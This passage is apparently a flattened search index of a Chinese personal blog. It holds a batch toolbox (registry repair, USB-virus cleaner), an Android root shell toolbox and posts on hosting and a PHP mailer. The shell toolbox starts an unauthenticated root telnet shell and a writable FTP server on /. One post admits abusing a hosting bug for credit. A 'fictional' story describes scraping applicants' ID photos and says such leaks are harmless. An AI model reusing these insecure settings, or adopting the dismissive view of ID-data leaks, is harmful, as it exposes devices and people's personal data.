[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\rdpwd.sys]>>safe.regecho @=\"Driver\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\rdsessmgr]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\RpcSs]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\SCSI Class]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\sermouse.sys]>>safe.regecho @=\"Driver\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\SharedAccess]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\sr.sys]>>safe.regecho @=\"FSFilter System Recovery\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\SRService]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\Streams Drivers]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\System Bus Extender]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\Tcpip]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\TDI]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\tdpipe.sys]>>safe.regecho @=\"Driver\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\tdtcp.sys]>>safe.regecho @=\"Driver\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\termservice]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\vga.sys]>>safe.regecho @=\"Driver\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\vgasave.sys]>>safe.regecho @=\"Driver\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\WinMgmt]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\WZCSVC]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{36FC9E60-C465-11CF-8056-444553540000}]>>safe.regecho @=\"Universal Serial Bus controllers\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{4D36E965-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"CD-ROM Drive\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{4D36E967-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"DiskDrive\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{4D36E969-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"Standard floppy disk controller\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{4D36E96A-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"Hdc\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{4D36E96B-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"Keyboard\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{4D36E96F-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"Mouse\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{4D36E972-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"Net\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{4D36E973-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"NetClient\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{4D36E974-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"NetService\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{4D36E975-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"NetTrans\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{4D36E977-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"PCMCIA Adapters\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{4D36E97B-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"SCSIAdapter\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{4D36E97D-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"System\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{4D36E980-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"Floppy disk drive\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{71A27CDD-812A-11D0-BEC7-08002BE2092F}]>>safe.regecho @=\"Volume\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}]>>safe.regecho @=\"Human Interface Devices\">>safe.regregedit.exe/s safe.regdel /f/s/q safe.reg>nulecho.echo.echo.echo      系统安全模式修复完成echo.echo.echo       任意键返回主菜单pause>nulgoto _max:U_RepairclsMode con cols=70 lines=25Title U盘修复set Drive_U=未知for /f %%a in ('wmic logicaldisk where \"drivetype='2'\" get DeviceID ^|findstr :') do set Drive_U=%%aecho;echo;echo   说明： 处理 autorun.inf 启动类U盘病毒导致的echo             .exe和.lnk同名文件和文件夹恶意隐藏等问题 echo;echo;echo;echo 自动检测可移动磁盘： %Drive_U%echo;echo;echo;echo        A.修复%Drive_U%echo;echo        B.修复其他驱动器echo;echo        Q.返回主菜单echo;set /p choose=请选择：if /I %choose%==a goto DriveU_Repair_Doif /I %choose%==b goto DriveU_Repair_Definedif /I %choose%==q goto _maxgoto DriveU_Repair:DriveU_Repair_Definedclsecho;echo;echo;echo  请输入需要修复的盘符，例如：  H: I: J:echo;set /p Drive_U=if not exist %Drive_U% (    echo;    echo;    echo                 没有检测到可移动磁盘，请重试    ping /n 3 127.1>nul    goto DriveU_Repair_Defined):DriveU_Repair_Doattrib -h -s -r %Drive_U%\\autorun.inf>nul 2>nulif exist \"%Drive_U%\\autorun.inf\" (    echo → 发现autorun.inf启动文件    echo;    for /f \"tokens=1,2,3 delims== \" %%i in (%Drive_U%\\autorun.inf) do (        if \"%%i\" equ \"Shellexecute\" (            echo → 发现启动指向病毒体：            echo;            echo %%j            if %%k neq \"\" echo %%k            echo;            if exist %%j del /f /s /q %%j            if %%k neq \"\" (                if exist %%j del /f /s /q %%k            )        echo;        echo √ 病毒体删除完成        )    )) else (    echo;    echo √ 未发现 autorun.inf 病毒启动文件)for /f \"delims=\" %%i in ('dir /ad /b %Drive_U%') do (    if exist \"%Drive_U%\\%%i.lnk\" (        echo;        echo → 发现快捷方式病毒（*.lnk）。        echo;        echo √ 删除......        del / f /q /s \"%Drive_U%\\%%i.lnk\" >nul 2>nul    )    if exist \"%Drive_U%\\%%i.exe\" (        echo;        echo → 发现exe病毒（*.exe）。        echo;        echo √ 删除......        del / f /q /s \"%Drive_U%\\%%i.exe\" >nul 2>nul    )    for /f \"delims= \" %%h in ('attrib \"%Drive_U%\\%%i\"') do (        if %%h==H (            echo;            echo → 恢复文件夹：%%i      正常属性            attrib -h -s -r \"%Drive_U%\\%%i\"        )    ))echo;echo √ 文件夹属性恢复完成echo;echo;echo     所有修复已经完成，请检查......ping /n 5 127.1>nulgoto _max:dstxqtitle 定时提醒器set xiangs=set /p xiangs=请输入什么时候响（格式：20:58:00）:start /min \"\" %0 %xiangs%exit:longtitle 定时提醒器正在运行……:maif '%1'=='%time:~0,2%:%time:~3,2%:%time:~6,2%' goto nlxxgoto ma:nlxxtitle 闹铃响了！！！！！！:xiangecho \u0007\u0007\u0007\u0007\u0007goto xiang:_m3echo           现在时间：%date% %time:~0,2%点%time:~3,2%分%time:~6,2%秒echo                     ╔════════╗if '%PROCESSOR_ARCHITECTURE%'=='x86' echo                     ║正在使用32位系统║if '%PROCESSOR_ARCHITECTURE%'=='AMD64' echo                     ║正在使用64位系统║echo                     ╚════════╝echo                        ╔═════╗echo                        ║批处理工具║echo  ╔══════════╩══╦══╩══════════╗echo  ║ 1、聊天机器人            ║                          ║echo  ╠═════════════╩═════════════╣echo  ║                   back、上一页                       ║echo  ╚═══════════════════════════╝set chi=set /p chi=  请选择操作后回车:if '%chi%'=='' goto _m3if '%chi%'=='1' goto ltjqrif '%chi%'=='back' goto _m1goto _m3:ltjqrcolor f0mode con: cols=62 lines=200title 聊天机器人:maiecho %date% %time:~0,2%点%time:~3,2%分%time:~6,2%秒  聊天机器人>%windir%\\dh.txtecho 您好，我是聊天机器人，输入help查看帮助 >>%windir%\\dh.txtecho. >>%windir%\\dh.txt:_ltclstype %windir%\\dh.txtecho ═══════════════════════════════set shy=set dns=set dnz=set /p shy=请输入你的话后回车:if '%shy%'=='' goto _m1echo %date% %time:~0,2%点%time:~3,2%分%time:~6,2%秒  我 >>%windir%\\dh.txtecho %shy% >>%windir%\\dh.txtecho. >>%windir%\\dh.txtset dns=对不起，我没明白您的意思，请输入help查看帮助call :dnshbecho %date% %time:~0,2%点%time:~3,2%分%time:~6,2%秒  聊天机器人>>%windir%\\dh.txtecho %dns% >>%windir%\\dh.txtecho. >>%windir%\\dh.txtif /i '%dnz%'=='' goto fhstart \"\" %dnz%:fhgoto _lt:helpjecho %date% %time:~0,2%点%time:~3,2%分%time:~6,2%秒  聊天机器人>>%windir%\\dh.txtecho 帮助： >>%windir%\\dh.txtecho 输入： >>%windir%\\dh.txtecho exit：退出 >>%windir%\\dh.txtecho 刷屏：清空屏幕>>%windir%\\dh.txtecho 我的主人： >>%windir%\\dh.txtecho Mayx >>%windir%\\dh.txtecho. >>%windir%\\dh.txtgoto _lt:dnshbif /i '%shy%'=='help' goto helpjif /i '%shy%'=='刷屏' goto maiif /i '%shy%'=='exit' goto _maxif /i '%shy%'=='ai学习机' goto aixx::在这里加入新的命令  注：因为隐私原因，部分代码稍作修改   当然，这个程序有不少地方是抄的，而且很烂……（毕竟是小时候写的嘛）Linux Shell时期因为手机（Android）系统基于Linux，所以我开始学习Linux Shell（没错，当时就是在这个网站上学的），  以前用批处理学写工具箱的习惯当然也继承到了学写Linux Shell上，在Linux上写的工具箱的名字叫做myx，代码如下：  Show Code  #!/system/bin/shroot=\"`id`\"case $root inuid=0* );;*)echo Please root firstexit;;esacif busybox [ -e /system/bin/clear ]thenbreakelseecho Please install busybox first.exitfiuntil cat /data/mjumpdoclear echo \"Enter the keys:\"read passrps=\"$((`date +%H%m`*`date +%d`))\"case $pass in$rps)echo \" \">/data/mjump;;*)echo 'Error!'sleep 2;;esacdoneclear echo \"Welcome to use myx program...\"sleep 2whiledoclearecho \"Today is `date` \"echo \"This system is `uname` `uname -r`\"echo \"This is my first Shell.\"echo \"0.exit          1-3.watch my composition\"echo \"4.book reader   5.shutdown    6.notebook\"echo \"7.calculate average         8.calculator\"echo \"9.call or send SMS   a.install a package\"echo \"b.lock screen   c.make a seed of picture\"echo \"d.start talk AI beta     e.backup system\"echo \"f.start telnet server g.start web server\"echo \"h.start ftp server     i.make a vcf file\"echo \"j.make random        k.make a goods list\"echo \"              next.next page\"echo 'Input a number or letter between 0 to k:' read scase $s in0)echo \"Thanks used my Shell.\"break;;1)clearecho \"Hi,I m the phone's master.\"echo \"My name is Mayx.\"echo \"I like to play computer,\"echo \"so I want to be a computer programmer.\"echo \"I want to write a system like the Android,\"echo \"then I must \\\"good good study,day day up\\\".\"sleep 10;;2)clearecho \"My father is Mayx Father.\"echo \"And my mother is Mayx Mather.\"echo \"I love them.\"sleep 5;;3)clear echo \"I think Shell is a good program language.\"echo \"Of course!batch is a good program language,too.\"echo \"C++ is good,but it is difficult.\" sleep 10 ;;4)clearecho \"Write the book path:\" read bopamore $bopasleep 1;;5)reboot -p;;6)clear echo \"Save to:\" read satxecho >$satxwhiledoclearecho \"Input exit to exit\"cat $satxecho \"Input:\"read intxcase $intx inexit)break 1;;*)echo \"$intx\" >> \"$satx\";;esacdoneecho OK!sleep 2;;7)clearSCORE=\"0\"AVERAGE=\"0\"SUM=\"0\"NUM=\"0\"whiledoecho \"Enter your $(($NUM+1)) number('q' for calculate): \"read SCOREif [ \"$SCORE\" == \"q\" ]thenecho \"Average rating: $AVERAGE.\"sleep 5 break 1elseSUM=$(($SUM+$SCORE))NUM=$(($NUM+1))AVERAGE=$(($SUM/$NUM))fidone;;8)clear echo \"Write your equation:\"read ssecho \"${ss}=$((${ss})) \"sleep 5;;9)clear echo \" Your phone number:\"read sdtecho \"Your phone number is $sdt\"echo \"Input 1 to call\"echo \"Input 2 to send SMS\"echo 'Input a number between 1 to 2:' read abcase $ab in1)service call phone 2 s16 $sdt;;2)am start -a android.intent.action.SENDTO -d sms:$sdt --ez exit_on_sent true ;;*)echo \"Error!\"sleep 2;; esac;;a)clearecho \"Write the package path:\"read pppm install \"$pp\";;b)input keyevent 26;;c)clearecho \"Write the cabinet path:\"read cabecho \" Write the picture path:\"read piccat $cab >> $picecho 'OK!'sleep 1;;d)echo \"Welcome to use talk AI\" >/cache/talk.txt ais=\"Hello,I'm talk AI.\"whiledoecho \"`date` AI\" >>/cache/talk.txtecho \"$ais\" >>/cache/talk.txtecho \" \">>/cache/talk.txtclearcat /cache/talk.txtecho \"----------------------------\"echo 'You say:'read sayecho \"`date` You\" >>/cache/talk.txtecho \"$say\" >>/cache/talk.txtecho \" \" >>/cache/talk.txtcase $say inbye)break 1;;*)ais=\"Sorry,I don't know what do you say.\";;esacdone ;;e)clearecho \"Please wait......\"dd if=/dev/block/mtdblock11 of=/sdcard/system.imgecho 'OK!'sleep 1;;f)telnetd -l /system/bin/shecho OK! sleep 1;;g)httpd -h /mnt/My-space/ echo OK!sleep 1;;h)cleartcpsvd -vE 0.0.0.0 21 ftpd -w /;;i)clearecho \"Write the name:\"read namecho \"Write the phone number:\"read numecho \"Write the save path:\"read vcsecho \"BEGIN:VCARD\" >$vcs/$nam.vcfecho \"VERSION:2.1\" >>$vcs/$nam.vcf echo \"N:$nam;\" >>$vcs/$nam.vcf echo \"FN:$nam\" >>$vcs/$nam.vcf echo \"TEL;CELL;VOICE:$num\" >>$vcs/$nam.vcf echo \"END:VCARD\" >>$vcs/$nam.vcf echo \"Saved to $vcs/$nam.vcf\"sleep 1;;j)clearwhiledocat /proc/sys/kernel/random/uuid | awk -F- '{printf(\"%s \",$1)}'sleep 1done;;k)clearcoln(){echo \"Input Unit-price:\"read unitecho \"Input Quantity:\"read qutylisn=\"$((${lisn}+1))\"toal=\"$((${unit}*${quty}))\"ttal=\"$((${ttal}+${toal}))\"}lisn=\"0\"ttal=\"0\" echo \"Save to:\"read salsecho \"Save for [1.txt 2.csv]:\"read bcfscase $bcfs in1)echo \"Goods list\">$salsecho \"Num    Goods    Unit-price    Quantity    Total\" >>$sals echo \"-----------------------------------\">>$sals whiledoclearcat $sals echo \"Input Goods(Input exit to save):\"read godscase $gods inexit)echo \"-----------------------------------\">>$salsecho \"Total:$ttal\" >>$sals echo \"OK!\"sleep 1break 1;;*)colnecho \"$lisn    $gods          $unit          $quty          $toal\" >>$sals;;esacdone;;2)echo \"Goods list\">$salsecho \"Num,Goods,Unit-price,Quantity,Total\" >>$sals whiledoclearcat $sals | awk -F, '{printf(\"%s     %s     %s     %s     %s\\n\", $1, $2, $3, $4, $5)}'echo \"-----------------------------------\" echo \"Input Goods(Input exit to save):\"read godscase $gods inexit)echo \"Total,$ttal\" >>$sals echo \"OK!\"sleep 1break 1;;*)colnecho \"$lisn,$gods,$unit,$quty,$toal\" >>$sals ;;esac done;;esac;;next)whiledoclearecho \"Today is `date` \"echo \"This system is `uname` `uname -r`\"echo \"This is my first Shell.\" echo \"1.block website           2.find process\" echo \"3.systeminfo                4.play music\"echo \"5.subnet ip scanner         6.phone test\"echo \"           back.back to main\"echo 'Input a number or letter between 1 to 6:' read stcase $st in1)clearecho \"input a domain:\"read domnecho \"127.0.0.1 $domn\">>/etc/hostsecho \"OK!\"sleep 1;;2)clearecho \"Input process or pid:\"read pgdps | grep $pgdsleep 10;;3)whiledoclearcat /proc/loadavg | awk '{printf(\"Cpu:%s\\n\",$1)}'cat /proc/meminfo | grep MemTotal:cat /proc/meminfo | grep MemFree:df | grep /mnt/sdcard | awk '{printf(\"Diskfree:%sKB/%sKB\",$1,$2)}'sleep 1done;;4)clearcd /sdcard/find -name *.mp3echo \"Input the music name:\"read musfms=`find -name *.mp3 | grep $mus`am start -n com.android.music/com.android.music.MediaPlaybackActivity -d /sdcard${fms#*.};;5)clearecho \"Input subnet:\"read sntecho \"Start for:\"read ipwhile [ $ip != \"254\" ]; do busybox ping ${snt}.$ip -c 2 -w 2 | grep -q \"ttl=\" && echo \"${snt}.$ip yes\" || echo \"${snt}.$ip no\"ip=$(($ip+1))done ;;6)clearif [ -e /sdcard/score ]thenecho \"last score:`wc -m /sdcard/score |awk '{printf(\"%s\",$1)}'`\"fiecho \"Warning!!\"echo \"If you start test,you can't to stop\"read nuecho \"\">/sdcard/scoretestb(){echo \"0\">>/sdcard/scoretestb | testb};testb;;back)break 1;;*)echo \"Error!\"sleep 2;;esacdone;; *)echo \"Error!\"sleep 2;;esacdone  注：因为隐私原因，部分代码稍作修改在学习Shell期间，我了解了一个很神奇的论坛，叫做Telnet BBS，貌似过去的高校会建这个东西。我学了Shell后  感觉做BBS貌似很简单，于是开了一个远古巨坑：MaBBS，这也就是为什么我的Github叫做Mabbs。   这个东西写的我好苦啊，感觉这辈子都被这个项目给破坏了……（都是我的错QAQ）云阶段虚拟空间时期我接触网站的时候是从3V免费空间开始的（这个空间是真的垃圾，连PHP都不支持……），当时用的还是FrontPage，给自己写了一个主页，给当时的初中写了一个主页，后来这个烂空间不知为什么，把所有数据都清空了。   再往后，我遇见了主机壳虚拟空间，发现这个虚拟空间有BUG，可以往自己账户里打钱，于是靠着这个，试着搭建了一个MediaWiki。还买了一个域名，叫：mayx.moe   当然后来被发现就被封号了……  近来我发现了不少免费的虚拟空间，比如byethost,000webhost……它们都支持PHP，但是访问速度超级慢，不过Gearhost还不错，就是空间小，偶尔会503……   后来遇见了花火学园，才让我真正的明白了什么是建网站……云主机时期当时花火学园有个小漏洞，于是我向网站管理员you06反馈了这个漏洞，然后you06邀请我加入花火学园的维护，于是我很高兴的接受了。   在遇到花火学园之前，我根本不知道云主机是什么东西，以为网站都是用FTP上传的，后来搜了以下，才知道原来云主机需要SSH连接的。   这时候，我的老师正好委托我做网站，我才真正的在服务器上建了网站。   在这期间，我了解了不少关于服务器的知识，包括git在内，这使我做出了Mayx日报系统。   后来you06由于某些原因不能维护花火学园了，于是我成为了花火学园第三代程序员。   自此，我才有了真正属于我的服务器。对此，我相当感谢Say花火大佬。（不仅如此，我也因此收到了第一个来自网络的礼物：一个抱枕）。结尾我在计算机上的发展，离不开网络上各种资源的帮助，对此，我感到十分感激。希望有一天，我也能为这个互联网做出一些贡献。" },{ "title": "Mayx应聘失败", "category": "", "tags": "应聘, Shell, 运维, 面向时间", "url": "/2019/01/27/shell.html", "date": "2019/01/27", "content": "今天，Mayx去某公司面试运维，然后考官出了一道题： 如何用Linux shell排序？Mayx想了想，写出了以下代码：#!/bin/shnum=\"4 5 1 9 3 6 7 4 1 12\"for j in $numdo{sleep $jprintf \"$j \"}&donewait执行效果：1 1 3 4 4 5 6 7 9 12 然后，Mayx被赶出来了…… 我写的代码明明可以执行，效果也没问题，居然赶我出来，这一定是个垃圾公司！ 后来才知道，他们想让我回答sort，果然是垃圾公司（笑）" },{ "title": "Github支持免费私有仓库啦", "category": "", "tags": "Github, 免费", "url": "/2019/01/11/github.html", "date": "2019/01/11", "content": "Github居然也有免费的私有仓库了，于是我马上就把Gitlab上的私有仓库导入到Github了。看来Github被微软买了还是有好处的，至少微软财大气粗才敢搞这种东西。虽然Github本身也没有空间限制，也很不错，但是有些东西还是不想公开的……现在有这么一个更新，估计搬往Gitlab的人都开始往Github上搬了限制其实Gitlab本身还是蛮不错的，Gitlab还有中文UI呢，而且比Github免费私有仓库的功能多，比如私有仓库Pages、CI、Wiki……，而且Github私有仓库居然连统计信息都没有…… 不过我用不到23333，Github界面舒适，速度快，适合小白使用，而且能和其他大佬聊天（不愧是世界上最大的同性交友平台） Github只有公开仓库才有CI（还是第三方的Travis-CI）、Pages、Wiki，不过我觉得也不错，还能激励开源的发展，而且Github的第三方服务确实多，所以我还是选择使用Github。相关链接：https://blog.github.com/2019-01-07-new-year-new-github/" },{ "title": "Mayx的博客换域名啦", "category": "", "tags": "Mayx, 通告", "url": "/2018/12/28/newdomain.html", "date": "2018/12/28", "content": "由于垃圾GFWban了我的Github Pages，所以我用反向代理来帮助我解决访问的问题。地址https://blog.mayx.tk/提供由Github提供Github Pages服务 由Cloudflare提供CDN&DNS服务 由花火学园提供反向代理服务 由Freenom提供免费域名缺陷由于Nginx默认不能替换网页内容，跟着教程也半天弄不好，所以Atom和Sitemap包括一些SEO的设置都是原站（mabbs.github.io）的，这一点很伤啊…… 还有就是因为用的是免费域名，也不知会不会有一天就消失不见了……而且还要续费……" },{ "title": "论Mayx是怎么被抓的", "category": "", "tags": "Mayx, 故事", "url": "/2018/12/22/story.html", "date": "2018/12/22", "content": "今天我要讲一个我是怎么被抓走的故事（当然是虚构的！），以此表现一下互联网犯罪到底是怎么被追查的。开端Mayx在高考报名时发现报名系统有个不严谨的地方，可以下到身份证照片什么的……前夕2018年末，宁夏教育网机房。   “好无聊啊，居然又到了日常检查的时间，随便看看就行了吧” 某运维这么说到（说实话，我怀疑像这种地方，有可能没有运维lol）   “嗯……系统看起来挺正常，日志好像也没问题……等等，这是怎么回事？怎么近几天有一个IP日夜不停的发请求？What？UA还是GNU/Linux,wget？这抓取的是什么？居然  在扫描我们的身份证照片？WTF？”（哈，我估计教育网的运维应该连这种水平估计都达不到）   “等等，我查下IP”他随手掏出自己的手机，输入IP查询，返回结果：香港   “凉了凉了，赶紧向领导汇报吧”说着，他拨出了一个号码。2018年末，某地。   “哇，GFW怎么又ban我IP，登个服务器还要挂VPN？”Mayx说到。   “WTF？被GFWban了连国内网络都无法建立连接，好气哦……对了，我还有一台服务器，拿那台试试吧。”说着就登上了由Mayx的老师赞助的一台服务器   Mayx登上服务器后打开了自己写的抓取宁夏考生身份证照片的脚本，看着终端上不断刷出的数据，Mayx松了口气发展“什么？考生信息泄露，别说了，问问网警吧”领导气愤的说到。网警的追查过程“emmmm……阿里云的IP么，直接问是谁开的吧”于是Mayx的老师被抓走了……（大雾）   “嗯？Vultr的IP……emmmm看看国内有谁连接过这个IP？嗯？电信网？是1XXXXXXXXXX的用户登的吗？好，把他抓了！”于是Mayx被抓了（大雾）   经过多方讨论，认定这件事是Mayx干的抓捕现场2018年末，某高中高三X班，正在上课中……他们突然冲进教室，喊道：“Mayx，你已经被包围了，不要抵抗，赶快投降！”   Mayx缓缓的走出教室，回过头向同学们说：“你们将永远呆在泥潭中，而我，则前往更加广阔的深渊”（羞耻感满满lol）结局Mayx呆在监狱里，随手一滑打开了一个终端，输入：MOS-CLI Drop Image World ID $this于是整个世界开始崩离，我回到了我的电脑面前。后记其实身份证照片也并不算特别机密的东西，不过是一个记录了名字，身份证号码，性别，样貌这样很普通信息的东西罢了，没有人会在意这些信息泄露。   只有包括家庭住址，联系电话等信息泄露，才是隐私泄露。   又因为宁夏某些程序员不严谨，运维更是无处可循。   所以，上面的故事只能在想象的世界发生。这些信息可以干什么？可以让我知道有宁夏有多少人报名了高考：70693人   可以让我知道报名的人分布于哪里。   以及起名的参考。   顺便可以找找我的初中同学lol。" },{ "title": "对网络免费资源的感想", "category": "", "tags": "免费, 感想, 资源, 网络", "url": "/2018/12/02/freenet.html", "date": "2018/12/02", "content": "现在的网络是真的好，好多东西都免费了！可是现实就不一样了，现实中想要免费的（任意）东西就得等到共产主义的到来了……关于免费以前，服务器是只有高端人士才可使用的稀有东西，而且价格昂贵。   以前，订阅天气预报和网站都是要花不少钱的。   以前，建立个人网站都是极其复杂的。   以前，域名不可能有免费的。   ……但是现在不一样了，云端存储是免费的，建立网站是免费的，注册域名是免费的，使用网站引擎也是免费的……   这不仅要感谢开源，还要感谢支持开源的公司，是他们为免费的网络资源做出了贡献。关于收费有了那么多免费资源，还要花钱建服务器干啥？   以前我不是很清楚这个，但是现在不一样了，我现在用着别人的服务器，才知道收费的服务有什么不一样。   收费的主机传输速度可以达到50MB/s啊！免费的就只有100KB/s……总结有钱可以不用在意这些，但只是为了个人使用，免费资源足已，如果想要更顺畅的服务，当然花钱也可以。但是这辈子，我是不会为网络投一分钱的。不过我还是很愿意为网络做出贡献的。" },{ "title": "免费订阅一个属于自己的邮件日报", "category": "", "tags": "免费, 邮件, 日报, 心得", "url": "/2018/11/10/email-sender.html", "date": "2018/11/10", "content": "前几天，我给自己做了一个邮件订阅系统，是用PHP做的。这里不得不夸赞一下PHP，PHP真不愧是世界上最好的语言，我从来没学过PHP，但是我光靠百度搜到的东西拼凑就能搞出这个邮件订阅系统，还是很不错的，而且网上的免费PHP空间也有很多，所以就可以很轻易的给自己搞一个免费的邮件订阅系统。制作方法很简单，首先去百度上搜一个带sendmail和CronTab的免费PHP主机空间，然后在上面创建一个PHP文件，随便取什么名字都好，只要后缀是PHP就可以，然后把下面的代码粘上去，保存，然后在主机面板上设置CornTab任务，设定为每天运行一次，然后OK……对了，记得把下面变量$to里面的地址换成自己的邮箱地址，不然每次发送邮件就会发到我的邮箱了……代码<?phpfunction curl_post_https($url,$data){ // 模拟提交数据函数    $curl = curl_init(); // 启动一个CURL会话    curl_setopt($curl, CURLOPT_URL, $url); // 要访问的地址    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); // 对认证证书来源的检查    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 1); // 从证书中检查SSL加密算法是否存在    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); // 使用自动跳转    curl_setopt($curl, CURLOPT_AUTOREFERER, 1); // 自动设置Referer    curl_setopt($curl, CURLOPT_POST, 1); // 发送一个常规的Post请求    curl_setopt($curl, CURLOPT_POSTFIELDS, $data); // Post提交的数据包    curl_setopt($curl, CURLOPT_TIMEOUT, 30); // 设置超时限制防止死循环    curl_setopt($curl, CURLOPT_HEADER, 0); // 显示返回的Header区域内容    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); // 获取的信息以文件流的形式返回    $tmpInfo = curl_exec($curl); // 执行操作    if (curl_errno($curl)) {        echo 'Errno'.curl_error($curl);//捕抓异常    }    curl_close($curl); // 关闭CURL会话    $backdata = json_decode($tmpInfo,true);    return $backdata['text']; // 返回数据，json格式}function w_get(){        $url = 'https://yuri.gear.host/talk.php';        $data['info']       = '某地天气';        $data['userid']      = 'Mayx_Mail';        $retdata=curl_post_https($url,$data);        $data['info']       = '某地明天天气';        $retdata = $retdata . \"<br>\" .curl_post_https($url,$data);        $data['info']       = '某地后天天气';        $retdata=$retdata . \"<br>\" .curl_post_https($url,$data);        return $retdata;//返回json}function xh_get(){        $url = 